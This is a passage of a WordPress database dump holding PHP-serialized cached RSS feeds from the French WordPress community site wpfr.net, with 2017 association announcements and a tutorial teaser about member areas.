WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1641226\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1521:\"Cher membre, Nous vous serions très obligés de bien vouloir assister à l’Assemblée Générale annuelle de l’association WordPress Francophone qui aura lieu mardi 12 décembre 2017, à 20 h 00. Cette assemblée générale se déroulera en direct sur YouTube par l’intermédiaire de l’application Google Hangout visible ici-même : L’ordre du jour abordé sera le suivant : Rapport<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=g8Lqzfsj1e0:6ZmWJIqm-Bg:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=g8Lqzfsj1e0:6ZmWJIqm-Bg:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/g8Lqzfsj1e0\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Un grand sondage pour mieux connaître la communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/ArHvRJvd55Y/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 May 2017 14:15:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1638548\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1516:\"Maxime et Alexandre, les « chefs cuistot » de la communauté viennent de lancer un sondage à destination de la communauté francophone de WordPress. L&#8217;objectif est de mieux connaitre celles et ceux qui la composent. Alors que vous soyez débutant ou confirmé, simple utilisateur, bidouilleur passionné ou professionnel venez répondre à ce questionnaire qui permettra de mieux<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=ArHvRJvd55Y:rW_1swugq14:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=ArHvRJvd55Y:rW_1swugq14:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/ArHvRJvd55Y\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Compte rendu de la réunion du bureau du 9 mars 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/scUWeRFptEQ/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Apr 2017 09:02:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"Réunion\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1629790\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1529:\"Présent : Willy Bahuaud, Xavier, Borderie, Benoît Catherineau et Aurélien Denis L’élection du nouveau bureau a été clôturée le 4 mars 2017. Le résultat donne vainqueur les 3 candidats suivants : Benoît Catherineau, Xavier Borderie, Aurélien Denis. Cette réunion a pour objet l’installation du nouveau bureau de WPFR. L’ordre du jour Répartition des postes de Président, Secrétaire<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=scUWeRFptEQ:5gEow5Kjbq4:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=scUWeRFptEQ:5gEow5Kjbq4:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/scUWeRFptEQ\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:48:\"http://feeds.feedburner.com/WordpressFrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:4:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:20:\"wordpressfrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:14:\"emailServiceId\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordpressFrancophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:18:\"feedburnerHostname\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://feedburner.google.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"feedFlare\";a:9:{i:0;a:5:{s:4:\"data\";s:24:\"Subscribe with NewsGator\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:112:\"http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://www.newsgator.com/images/ngsub1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:24:\"Subscribe with Bloglines\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:77:\"http://www.bloglines.com/sub/http://feeds.feedburner.com/WordpressFrancophone\";s:3:\"src\";s:48:\"http://www.bloglines.com/images/sub_modern11.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:23:\"Subscribe with Netvibes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:98:\"http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:39:\"//www.netvibes.com/img/add2netvibes.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:21:\"Subscribe with Google\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:93:\"http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:51:\"http://buttons.googlesyndication.com/fusion/add.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:25:\"Subscribe with Pageflakes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:101:\"http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:87:\"http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&fileName=ATP_blu_91x17.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:21:\"Subscribe with Plusmo\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:86:\"http://www.plusmo.com/add?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:43:\"http://plusmo.com/res/graphics/fbplusmo.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:23:\"Subscribe with Live.com\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:81:\"http://www.live.com/?add=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:141:\"http://tkfiles.storage.msn.com/x1piYkpqHC_35nIp1gLE68-wvzLZO8iXl_JMledmJQXP-XTBOLfmQv4zhj4MhcWEJh_GtoBIiAl1Mjh-ndp9k47If7hTaFno0mxW9_i3p_5qQw\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:25:\"Subscribe with Mon Yahoo!\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:99:\"https://add.my.yahoo.com/content?lg=fr&url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:60:\"http://us.i1.yimg.com/us.yimg.com/i/us/my/bn/intatm_fr_1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:25:\"Subscribe with Excite MIX\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:89:\"http://mix.excite.eu/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://image.excite.co.uk/mix/addtomix.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:52:\"http://backend.userland.com/creativeCommonsRssModule\";a:1:{s:7:\"license\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://creativecommons.org/licenses/by-nc-sa/3.0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:10:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"KOpVGqfxVL5wdKgox9r40NxZA3o\";s:13:\"last-modified\";s:29:\"Fri, 08 Dec 2017 07:30:36 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:7:\"expires\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";}}s:5:\"build\";s:14:\"20130911020210\";}','no'),(2469,'_transient_timeout_feed_mod_66a70e9599b658d5cc038e8074597e7c','1512762162','no'),(2470,'_transient_feed_mod_66a70e9599b658d5cc038e8074597e7c','1512718962','no'),(2471,'_transient_timeout_feed_76f8d9281c01f21e505004d0986f50c6','1512762162','no'),(2472,'_transient_feed_76f8d9281c01f21e505004d0986f50c6','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:5:\"\n		\n	\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:79:\"\n		\n		\n		\n		\n		\n		\n					\n						\n						\n						\n						\n						\n						\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Planète WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"https://wpfr.net/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Toute l’actualité de WordPress en français !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:8:{i:0;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Comment créer un Espace de Membres avec votre WordPress ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/eTpoqvkpD9o/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/espace-membres-wordpress/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 07 Dec 2017 08:04:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:589:\"\n		        Si vous êtes plusieurs à utiliser le même site WordPress, vous connaissez déjà la notion de rôles que vous pouvez définir dans la rubrique  “utilisateurs” de votre Dashboard. L’espace de membres reprend cette notion mais il vous permet surtout de créer un espace dédié spécifiquement à vos utilisateurs. &#160; Pourquoi créer un Espace de Membres [&#8230;]\n\n\nComment créer un Espace de Membres avec votre WordPress ? est un article de WP FormationFormation WordPress, SEO &amp; WooCommerce - Pour ne rien manquer : Abonnez-vous à la newsletter !\n		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Formation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1428:\"<p><img width=\"877\" height=\"547\" src=\"https://cdn.wpformation.com/wp-content/uploads/2017/11/espace-de-membres-WordPress.jpg\" class=\"attachment-Large size-Large wp-post-image\" alt=\"espace de membres WordPress\" style=\"margin-left: 0px;margin-right: auto;margin-top:10px;margin-bottom:10px;max-width: 640px;max-height: 400px\" />Si vous êtes plusieurs à utiliser le même site WordPress, vous connaissez déjà la notion de rôles que vous pouvez définir dans la rubrique  “utilisateurs” de votre Dashboard. L’espace de membres reprend cette notion mais il vous permet surtout de créer un espace dédié spécifiquement à vos utilisateurs. &#160; Pourquoi créer un Espace de Membres [&#8230;]</p>\n<p></p>\n<hr>\n<a rel=\"nofollow\" href=\"https://wpformation.com/espace-membres-wordpress/\">Comment créer un Espace de Membres avec votre WordPress ?</a> est un article de <a title=\"Formation WordPress Ecommerce\" href=\"https://wpformation.com\">WP Formation</a><br /><a 